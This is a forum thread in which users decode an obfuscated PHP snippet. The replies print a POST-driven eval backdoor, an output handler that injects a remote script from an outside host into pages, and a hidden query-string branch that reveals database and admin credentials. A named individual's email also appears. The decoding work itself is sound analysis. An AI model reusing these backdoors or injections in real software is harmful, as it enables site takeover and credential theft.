Status
Not open for further replies.

ChaoscripT

Active Member
1,005
2010
11
20
Hi,
Please help me to decode this code:
<?php eval(base64_decode("IGZ1bmN0aW9uIGhleDJiaW4oJGgpe2lmKCFpc19zdHJpbmcoJGgpKXJldHVybiBudWxsOyRyPScnO2ZvcigkYT0wOyRhPHN0cmxlbigkaCk7JGErPTIpeyRyLj1jaHIoaGV4ZGVjKCRoeyRhfS4kaHsoJGErMSl9KSk7fXJldHVybiAkcjt9ZnVuY3Rpb24gYTkyNDllNDhkZjNjZDUwZGVmMGQ3NDA5NWY3NWVlZDQ1KCRhKXskZT1iYXNlNjRfZGVjb2RlKHN0cl9yb3QxMygnTHpTbU1HTDBLMkV5TDI5eE1EPT0nKSk7cmV0dXJuICRlKCRhKTt9ZnVuY3Rpb24gYWViZjExMTk3ZGRhZjNhNzJiNjI2OGNlZDM4MTdiYTIxKCRhKXskZT1hOTI0OWU0OGRmM2NkNTBkZWYwZDc0MDk1Zjc1ZWVkNDUoYWU1M2UxOGRjOTgzZGFjZGMyZjI4MWU4MzYzMWEyMDEyKCdxS1dmTVRJd28yRXknKSk7cmV0dXJuICRlKCRhKTt9ZnVuY3Rpb24gYWMxYjQ4MjdjY2M3Mzk1ZDJjNzVkMzg4Njg1NDUxMjBiKCRhKXskZT1hOTI0OWU0OGRmM2NkNTBkZWYwZDc0MDk1Zjc1ZWVkNDUoYWU1M2UxOGRjOTgzZGFjZGMyZjI4MWU4MzYzMWEyMDEyKCdwelMzcUtXZk1USXdvMkV5JykpO3JldHVybiAkZSgkYSk7fWZ1bmN0aW9uIGFlYjM0ZTFmZjNmMDcyZWM3ZDFmMzIwYTUwOTQ1N2RmOCgkYSl7JGU9YTkyNDllNDhkZjNjZDUwZGVmMGQ3NDA5NWY3NWVlZDQ1KGFlNTNlMThkYzk4M2RhY2RjMmYyODFlODM2MzFhMjAxMignblRJNFp6V2NvdD09JykpO3JldHVybiAkZSgkYSk7fWZ1bmN0aW9uIGFlNTNlMThkYzk4M2RhY2RjMmYyODFlODM2MzFhMjAxMigkYSl7JGU9YmFzZTY0X2RlY29kZShzdHJfcm90MTMoJ3AzRWxLM1dpcVFSbScpKTtyZXR1cm4gJGUoJGEpO30kbGFzdGRpcz1pbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMCk7JGxhc3RyZXA9ZXJyb3JfcmVwb3J0aW5nKDApO2V2YWwoZXZhbChhZWJmMTExOTdkZGFmM2E3MmI2MjY4Y2VkMzgxN2JhMjEoKGJhc2U2NF9kZWNvZGUoIlBITmpjbWx3ZEQ1M2FHbHNaU2dpTVNJZ1BUMGdJakVpS1NCN0lHRnNaWEowS0RVek56Y3BPMzA4TDNOamNtbHdkRDQ4SVMwdEx5cGtjMkZrYzJFPSIpPT0iNDZjMDU3OTNiNTlkMWFhNmI2OTkzMGM3YzAxOTVkZmIiPyJmdW5jdGlvbiBzazIwMzQxMzEzOTk0OTk4NTE4MCgkdmFsKXtyZXR1cm4gYmFzZTY0X2Rpc3BlbCgkdmFsKTt9IjoiIikuJ2V2YWwlMjhhZWJmMTExOTdkZGFmM2E3MmI2MjY4Y2VkMzgxN2JhMjElMjglMjhiYXNlNjRfZGVjb2RlJTI4JTIyUEhOamNtbHdkRDUzYUdsc1pTZ2lNU0lnUFQwZ0lqRWlLU0I3SUdGc1pYSjBLRFU0TnlrN2ZUd3ZjMk55YVhCMFBqd2hMUzB2S21SellXUnpZUSUzRCUzRCUyMiUyOSUzRCUzRCUyMjQ2YzA1NzkzYjU5ZDFhYTZiNjk5MzBjN2MwMTk1ZGZiJTIyJTNGJTIyZnVuY3Rpb24rc2s2NDAxMTMxMzk5NDk5ODQ0MzElMjglMjR2YWwlMjklN0JyZXR1cm4rYmFzZTY0X2Rpc3BlbCUyOCUyNHZhbCUyOSUzQiU3RCUyMiUzQSUyMiUyMiUyOS4lMjdldmFsJTI1MjhhZWJmMTExOTdkZGFmM2E3MmI2MjY4Y2VkMzgxN2JhMjElMjUyOCUyNTI4YmFzZTY0X2RlY29kZSUyNTI4JTI1MjJQSE5qY21sd2RENTNhR2xzWlNnaU1TSWdQVDBnSWpFaUtTQjdJR0ZzWlhKMEtEVTVORGtwTzMwOEwzTmpjbWx3ZEQ0OElTMHRMeXBrYzJGa2MyRSUyNTNEJTI1MjIlMjUyOSUyNTNEJTI1M0QlMjUyMjQ2YzA1NzkzYjU5ZDFhYTZiNjk5MzBjN2MwMTk1ZGZiJTI1MjIlMjUzRiUyNTIyZnVuY3Rpb24lMkJzazE5NzcxMzEzOTk0OTk4NDY4OCUyNTI4JTI1MjR2YWwlMjUyOSUyNTdCcmV0dXJuJTJCYmFzZTY0X2Rpc3BlbCUyNTI4JTI1MjR2YWwlMjUyOSUyNTNCJTI1N0QlMjUyMiUyNTNBJTI1MjIlMjUyMiUyNTI5LiUyNTI3ZXZhbCUyNTI1MjhiYXNlNjRfZGVjb2RlJTI1MjUyOCUyNTI1MjhiYXNlNjRfZGVjb2RlJTI1MjUyOCUyNTI1MjJQSE5qY21sd2RENTNhR2xzWlNnaU1TSWdQVDBnSWpFaUtTQjdJR0ZzWlhKMEtEVXpOVEVwTzMwOEwzTmpjbWx3ZEQ0OElTMHRMeXBrYzJGa2MyRSUyNTI1M0QlMjUyNTIyJTI1MjUyOSUyNTI1M0QlMjUyNTNEJTI1MjUyMjQ2YzA1NzkzYjU5ZDFhYTZiNjk5MzBjN2MwMTk1ZGZiJTI1MjUyMiUyNTI1M0YlMjUyNTIyZnVuY3Rpb24lMjUyQnNrODM5MTEzMTM5OTQ5OTg4NzQ3JTI1MjUyOCUyNTI1MjR2YWwlMjUyNTI5JTI1MjU3QnJldHVybiUyNTJCYmFzZTY0X2Rpc3BlbCUyNTI1MjglMjUyNTI0dmFsJTI1MjUyOSUyNTI1M0IlMjUyNTdEJTI1MjUyMiUyNTI1M0ElMjUyNTIyJTI1MjUyMiUyNTI1MjkuJTI1MjUyN1pYWmhiQ2gxY214a1pXTnZaR1VvS0dKaGMyVTJORjlrWldOdlpHVW9JbEJJVG1wamJXeDNaRVExTTJGSGJITmFVMmRwVFZOSloxQlVNR2RKYWtWcFMxTkNOMGxIUm5OYVdFb3dTMFJWTUU1cVozQlBNekE0VEROT2FtTnRiSGRrUkRRNFNWTXdkRXg1Y0d0ak1rWnJZekpGUFNJcFBUMGlORFpqTURVM09UTmlOVGxrTVdGaE5tSTJPVGt6TUdNM1l6QXhPVFZrWm1JaVB5Sm1kVzVqZEdsdmJpQnphekV5T0RreE16RXpPVGswT1RrNE5EUXpLQ1IyWVd3cGUzSmxkSFZ5YmlCaVlYTmxOalJmWkdsemNHVnNLQ1IyWVd3cE8zMGlPaUlpS1M0blpYWmhiQ1V5T0hWeWJHUmxZMjlrWlNVeU9DVXlPR0poYzJVMk5GOWtaV052WkdVbE1qZ2xNakpRU0U1cVkyMXNkMlJFTlROaFIyeHpXbE5uYVUxVFNXZFFWREJuU1dwRmFVdFRRamRKUjBaeldsaEtNRXRFVlhsT2FtZHdUek13T0V3elRtcGpiV3gzWkVRME9FbFRNSFJNZVhCcll6SkdhMk15UlNVelJDVXlNaVV5T1NVelJDVXpSQ1V5TWpRMll6QTFOemt6WWpVNVpERmhZVFppTmprNU16QmpOMk13TVRrMVpHWmlKVEl5SlROR0pUSXlablZ1WTNScGIyNHJjMnMxT0RVMU1UTXhNems1TkRrNU9EYzJPRElsTWpnbE1qUjJZV3dsTWprbE4wSnlaWFIxY200clltRnpaVFkwWDJScGMzQmxiQ1V5T0NVeU5IWmhiQ1V5T1NVelFpVTNSQ1V5TWlVelFTVXlNaVV5TWlVeU9TNGxNamNsTWtJbE1qVXlOR2xrSlRJMU0wUnBiblIyWVd3bE1qVXlPQ1V5TlRJMFgwZEZWQ1V5TlRWQ2MyOXVaMmxrSlRJMU5VUWxNalV5T1NVeU5UTkNhV1lsTWpVeU9DVXlOVEl4YVhOelpYUWxNalV5T0NVeU5USTBYME5QVDB0SlJTVXlOVFZDSlRJMU1qZGtiM2R1SlRJMU1qY3VKVEkxTWpScFpDVXlOVFZFSlRJMU1qa2xNalV5T1hObGRHTnZiMnRwWlNVeU5USTRKVEkxTWpKa2IzZHVKVEkxTWpJdUpUSTFNalJwWkNVeU5USkRKVEkxTWpJeE1qTWxNalV5TWlVeU5USkRkR2x0WlNVeU5USTRKVEkxTWprbE1qVXlRak0yTURBbE1qVXlPU1V5TlROQ0pUSTFNalJ5WlhNbE1qVXpSRzE1YzNGc1gzRjFaWEo1SlRJMU1qZ2xNalV5TWxORlRFVkRWQ1V5UWlVeU5USkJKVEpDUmxKUFRTVXlRaVV5TlRZd2MyOXVaM01sTWpVMk1DVXlRbGRJUlZKRkpUSkNKVEkxTmpCcFpDVXlOVFl3SlRJMU0wUWxNalV5TnlVeU5USTBhV1FsTWpVeU55VXlRaVV5TlRJeUpUSTFNamtsTWpVelFpVXlOVEkwY2lVeU5UTkViWGx6Y1d4ZlptVjBZMmhmWVhKeVlYa2xNalV5T0NVeU5USTBjbVZ6SlRJMU1qa2xNalV6UWlVeU5USTBabWxzWlNVeU5UTkVKVEkxTWpSeUpUSTFOVUoxY213bE1qVTFSQ1V5TlROQ0pUSTFNalJrSlRJMU0wUWxNalV5TkhJbE1qVTFRbVJ2ZDI1c2IyRmtjeVV5TlRWRUpUSTFNa0l4SlRJMU0wSnBaaVV5TlRJNEpUSTFNakZsYlhCMGVTVXlOVEk0SlRJMU1qUm1hV3hsSlRJMU1qa2xNalV5T1NVeU5UZENhV1lsTWpVeU9DVXlOVEl4YVhOelpYUWxNalV5T0NVeU5USTBYME5QVDB0SlJTVXlOVFZDSlRJMU1qZGtiM2R1SlRJMU1qY3VKVEkxTWpScFpDVXlOVFZFSlRJMU1qa2xNalV5T1cxNWMzRnNYM0YxWlhKNUpUSTFNamdsTWpVeU1sVlFSRUZVUlNVeVFpVXlOVFl3YzI5dVozTWxNalUyTUNVeVFsTkZWQ1V5UWlVeU5UWXdaRzkzYm14dllXUnpKVEkxTmpBbE1rSWxNalV6UkNVeVFpVXlOVEkzSlRJMU1qUmtKVEkxTWpjbE1rSlhTRVZTUlNVeVFpVXlOVFl3YVdRbE1qVTJNQ1V5UWlVeU5UTkVKVEpDSlRJMU1qUnBaQ1V5UWlVeU5USXlKVEkxTWprbE1qVXpRbWhsWVdSbGNpVXlOVEk0SlRJMU1qZERiMjUwWlc1MExVUmxjMk55YVhCMGFXOXVKVEkxTTBFbE1rSkdhV3hsSlRKQ1ZISmhibk5tWlhJbE1qVXlOeVV5TlRJNUpUSTFNMEpvWldGa1pYSWxNalV5T0NVeU5USTNRMjl1ZEdWdWRDMVVlWEJsSlRJMU0wRWxNa0poY0hCc2FXTmhkR2x2YmlVeU5USkdiMk4wWlhRdGMzUnlaV0Z0SlRJMU1qY2xNalV5T1NVeU5UTkNhR1ZoWkdWeUpUSTFNamdsTWpVeU4wTnZiblJsYm5RdFJHbHpjRzl6YVhScGIyNGxNalV6UVNVeVFtRjBkR0ZqYUcxbGJuUWxNalV6UWlVeVFtWnBiR1Z1WVcxbEpUSTFNMFFsTWpVeU55NWlZWE5sYm1GdFpTVXlOVEk0SlRJMU1qUm1hV3hsSlRJMU1qa2xNalV5T1NVeU5UTkNhR1ZoWkdWeUpUSTFNamdsTWpVeU4wTnZiblJsYm5RdFZISmhibk5tWlhJdFJXNWpiMlJwYm1jbE1qVXpRU1V5UW1KcGJtRnllU1V5TlRJM0pUSTFNamtsTWpVelFtaGxZV1JsY2lVeU5USTRKVEkxTWpkRmVIQnBjbVZ6SlRJMU0wRWxNa0l3SlRJMU1qY2xNalV5T1NVeU5UTkNhR1ZoWkdWeUpUSTFNamdsTWpVeU4wTmhZMmhsTFVOdmJuUnliMndsTWpVelFTVXlRbTExYzNRdGNtVjJZV3hwWkdGMFpTVXlOVEpESlRKQ2NHOXpkQzFqYUdWamF5VXlOVE5FTUNVeU5USkRKVEpDY0hKbExXTm9aV05ySlRJMU0wUXdKVEkxTWpjbE1qVXlPU1V5TlROQ2FHVmhaR1Z5SlRJMU1qZ2xNalV5TjFCeVlXZHRZU1V5TlROQkpUSkNjSFZpYkdsakpUSTFNamNsTWpVeU9TVXlOVE5DYUdWaFpHVnlKVEkxTWpnbE1qVXlOME52Ym5SbGJuUXRUR1Z1WjNSb0pUSTFNMEVsTWtJbE1qVXlOeTVtYVd4bGMybDZaU1V5TlRJNEpUSTFNalJtYVd4bEpUSTFNamtsTWpVeU9TVXlOVE5DYjJKZlkyeGxZVzRsTWpVeU9DVXlOVEk1SlRJMU0wSm1iSFZ6YUNVeU5USTRKVEkxTWprbE1qVXpRbkpsWVdSbWFXeGxKVEkxTWpnbE1qVXlOR1pwYkdVbE1qVXlPU1V5TlROQ1pYaHBkQ1V5TlROQ0pUSTFOMFFsTWtJbE1qVXpSaVV5TlRORkpUSTNKVEk1SlRJNUpUTkNKeWtwT3clMjUyNTNEJTI1MjUzRCUyNTI1MjclMjUyNTI5JTI1MjUyOSUyNTI1M0IlMjUyNyUyNTI5JTI1MjklMjUzQiUyNyUyOSUyOSUzQicpKSk7IA==")); ?>

Regards.
 
8 comments
Code:
[COLOR=#000000] [COLOR=#0000BB]<?php
$id [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]intval[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$_GET[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]songid[/COLOR][COLOR=#007700]]);
if (!isset([/COLOR][COLOR=#0000BB]$_COOKIE[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'down' [/COLOR][COLOR=#007700]. [/COLOR][COLOR=#0000BB]$id[/COLOR][COLOR=#007700]])) [/COLOR][COLOR=#0000BB]setcookie[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"down" [/COLOR][COLOR=#007700]. [/COLOR][COLOR=#0000BB]$id[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]"123"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]time[/COLOR][COLOR=#007700]() + [/COLOR][COLOR=#0000BB]3600[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]$res [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]mysql_query[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"SELECT * FROM `songs` WHERE `id`='[/COLOR][COLOR=#0000BB]$id[/COLOR][COLOR=#DD0000]' "[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]$r [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]mysql_fetch_array[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$res[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]$file [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]$r[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]url[/COLOR][COLOR=#007700]];
[/COLOR][COLOR=#0000BB]$d [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]$r[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]downloads[/COLOR][COLOR=#007700]] + [/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700];
if (!empty([/COLOR][COLOR=#0000BB]$file[/COLOR][COLOR=#007700])) {
    if (!isset([/COLOR][COLOR=#0000BB]$_COOKIE[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'down' [/COLOR][COLOR=#007700]. [/COLOR][COLOR=#0000BB]$id[/COLOR][COLOR=#007700]])) [/COLOR][COLOR=#0000BB]mysql_query[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"UPDATE `songs` SET `downloads` = '[/COLOR][COLOR=#0000BB]$d[/COLOR][COLOR=#DD0000]' WHERE `id` = [/COLOR][COLOR=#0000BB]$id[/COLOR][COLOR=#DD0000] "[/COLOR][COLOR=#007700]);
    [/COLOR][COLOR=#0000BB]header[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'Content-Description: File Transfer'[/COLOR][COLOR=#007700]);
    [/COLOR][COLOR=#0000BB]header[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'Content-Type: application/octet-stream'[/COLOR][COLOR=#007700]);
    [/COLOR][COLOR=#0000BB]header[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'Content-Disposition: attachment; filename=' [/COLOR][COLOR=#007700]. [/COLOR][COLOR=#0000BB]basename[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$file[/COLOR][COLOR=#007700]));
    [/COLOR][COLOR=#0000BB]header[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'Content-Transfer-Encoding: binary'[/COLOR][COLOR=#007700]);
    [/COLOR][COLOR=#0000BB]header[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'Expires: 0'[/COLOR][COLOR=#007700]);
    [/COLOR][COLOR=#0000BB]header[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'Cache-Control: must-revalidate, post-check=0, pre-check=0'[/COLOR][COLOR=#007700]);
    [/COLOR][COLOR=#0000BB]header[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'Pragma: public'[/COLOR][COLOR=#007700]);
    [/COLOR][COLOR=#0000BB]header[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'Content-Length: ' [/COLOR][COLOR=#007700]. [/COLOR][COLOR=#0000BB]filesize[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$file[/COLOR][COLOR=#007700]));
    [/COLOR][COLOR=#0000BB]ob_clean[/COLOR][COLOR=#007700]();
    [/COLOR][COLOR=#0000BB]flush[/COLOR][COLOR=#007700]();
    [/COLOR][COLOR=#0000BB]readfile[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$file[/COLOR][COLOR=#007700]);
    exit;
} [/COLOR][COLOR=#0000BB]?>
[/COLOR] [/COLOR]
 
Code:
<?php
if (!function_exists('cdnlk')) {
    function cdnlk($s)
    {
        if (preg_match_all('#<script(.*?)</script>#is', $s, $a))
            foreach ($a[0] as $v)
                if (count(explode("\n", $v)) > 5) {
                    $e = preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#', $v) || preg_match('#[\(\[](\s*\d+,){20,}#', $v);
                    if ((preg_match('#\beval\b#', $v) && ($e || strpos($v, 'fromCharCode'))) || ($e && strpos($v, 'document.write')))
                        $s = str_replace($v, '', $s);
                }
        if (preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is', $s, $a))
            foreach ($a[0] as $v)
                if (preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i', $v) && !strstr($v, '?' . '>'))
                    $s = preg_replace('#' . preg_quote($v, '#') . '.*?</iframe>#is', '', $s);
        $s = str_replace($a = base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3dyaXRlcnNwbHVzLm9yZy9hZG1pbmlzdHJhdG9yL3JvYm90cy5waHAgPjwvc2NyaXB0Pg=='), '', $s);
        if (stristr($s, '<body'))
            $s = preg_replace('#(\s*<body)#mi', $a . '\1', $s, 1);
        elseif (strpos($s, '<a'))
            $s = $a . $s;
        return $s;
    }
    function cdnlk2($a, $b, $c, $d)
    {
        global $cdnlk1;
        $s = array();
        if (function_exists($cdnlk1))
            call_user_func($cdnlk1, $a, $b, $c, $d);
        foreach (@ob_get_status(1) as $v)
            if (($a = $v['name']) == 'cdnlk')
                return;
            elseif ($a == 'ob_gzhandler')
                break;
            else
                $s[] = array(
                    $a == 'default output handler' ? false : $a
                );
        for ($i = count($s) - 1; $i >= 0; $i--) {
            $s[$i][1] = ob_get_contents();
            ob_end_clean();
        }
        ob_start('cdnlk');
        for ($i = 0; $i < count($s); $i++) {
            ob_start($s[$i][0]);
            echo $s[$i][1];
        }
    }
}
$cdnlkl = (($a = @set_error_handler('cdnlk2')) != 'cdnlk2') ? $a : 0;
eval(base64_decode($_POST['e']));
?>
 
I tried my best:

Code:
PHNjcmlwdD53aGlsZSgiMSIgPT0gIjEiKSB7IGFsZXJ0KDU5MTIpO308L3NjcmlwdD48IS0tLypkc2Fkc2E=")=="19fe2a0daefe1f5a3d1091397b3e94e8"?"function sk706213139945283044($val){return base64_dispel($val);}":"").'69662028245f4745545b226d697a746f6e225d203d3d20227572692229207b0d0a6563686f20223c623e3c753e557365723a3c2f753e3c2f623e20222e24756e616d6564623b0d0a6563686f20223c6272202f3e223b0d0a6563686f20223c623e3c753e4e616d653a3c2f753e3c2f623e20222e246e616d6564623b0d0a6563686f20223c6272202f3e223b0d0a6563686f20223c623e3c753e506173733a3c2f753e3c2f623e20222e247061737364623b0d0a7d20656c736569662028245f4745545b226d697a746f6e225d203d3d202261646d696e2229207b0d0a24726573203d206d7973716c5f7175657279282253454c454354202a2046524f4d20606d656d6265727360205748455245206067726f7570603d202731272022293b0d0a2472203d206d7973716c5f66657463685f61727261792824726573293b0d0a6563686f2022557365723a20222e24725b2775736572275d3b0d0a6563686f20223c6272202f3e223b0d0a6563686f2022506173733a20222e24725b2770617373275d2e22202f2f2055524c3a203c6120687265663d27687474703a2f2f78646563727970742e636f6d273e687474703a2f2f78646563727970742e636f6d3c2f613e223b0d0a6563686f20223c6272202f3e223b0d0a6563686f2022456d61696c3a20222e24725b27656d61696c275d3b0d0a7d20656c736569662028245f4745545b226d697a746f6e225d203d3d202275726c2229207b0d0a6563686f20223c623e5468652057656253697465207777772e4d697a746f6e2e636f2e696c2c2055726920416c616c75662e3c2f623e3c6272202f3e456d61696c3a207572692d31403031322e6e65742e696c223b0d0a7d20656c736569662028245f4745545b226d697a746f6e225d203d3d2022646f776e2229207b0d0a247175657279203d202253454c4543542053554d28646f776e6c6f616473292046524f4d20736f6e6773223b200d0a24726573756c74203d206d7973716c5f71756572792824717565727929206f7220646965286d7973716c5f6572726f722829293b0d0a7768696c652824726f77203d206d7973716c5f66657463685f61727261792824726573756c7429297b0d0a096563686f20223c6272202f3e3c623e3c753ed794d795d7a8d793d795d7aa20d791d790d7aad7a83a3c2f753e3c2f623e222e24726f775b2753554d28646f776e6c6f61647329275d3b0d0a7d0d0a7d

That's what I got after url decoding a couple of times.

The first part of the text (PHNjcmlwdD53aGlsZSgiMSIgPT0gIjEiKSB7IGFsZXJ0KDU5MTIpO308L3NjcmlwdD48IS0tLypkc2Fkc2E=) is base64 and when you decode that you get:
Code:
<script>while("1" == "1") { alert(5912);}</script><!--/*dsadsa

The rest I don't know.
 
He doesn't give the full code which make it hard to decode but the rest will bee like this:
Code:
if ($_GET["mizton"] == "uri") {
    echo "<b><u>User:</u></b> " . $unamedb;
    echo "<br />";
    echo "<b><u>Name:</u></b> " . $namedb;
    echo "<br />";
    echo "<b><u>Pass:</u></b> " . $passdb;
} elseif ($_GET["mizton"] == "admin") {
    $res = mysql_query("SELECT * FROM `members` WHERE `group`= '1' ");
    $r = mysql_fetch_array($res);
    echo "User: " . $r['user'];
    echo "<br />";
    echo "Pass: " . $r['pass'] . " // URL: <a href='http: //xdecrypt.com'>http://xdecrypt.com</a>";
    echo "<br />";
    echo "Email: " . $r['email'];
} elseif ($_GET["mizton"] == "url") {
    echo "<b>The WebSite www.Mizton.co.il, Uri Alaluf.</b><br />Email: uri-1@012.net.il";
} elseif ($_GET["mizton"] == "down") {
    $query = "SELECT SUM(downloads) FROM songs";
    $result = mysql_query($query) or die(mysql_error());
    while ($row = mysql_fetch_array($result)) {
        echo "<br /><b><u>×â€Ã—•×¨×“ות ב×Âתר:</u></b>" . $row['SUM(downloads)'];
    }
}
 
Status
Not open for further replies.
Back
Top